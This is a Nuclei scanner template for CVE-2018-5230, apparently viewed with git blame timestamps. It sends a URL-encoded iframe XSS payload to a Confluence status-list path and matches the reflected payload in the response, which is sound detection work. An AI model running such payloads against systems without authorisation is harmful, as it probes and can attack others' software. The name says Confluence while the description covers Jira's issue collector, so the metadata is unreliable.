nuclei-templates/cves/2018/CVE-2018-5230.yaml

30 lines
1.1 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-5230
info:
name: Atlassian Confluence Status-List XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
tags: cve,cve2018,atlassian,confluence,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-5230
cwe-id: CWE-79
description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified."
reference:
- https://jira.atlassian.com/browse/JRASERVER-67289
requests:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
matchers-condition: and
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: word
words:
- "SRC=\"javascript:alert(1337)\">"
part: body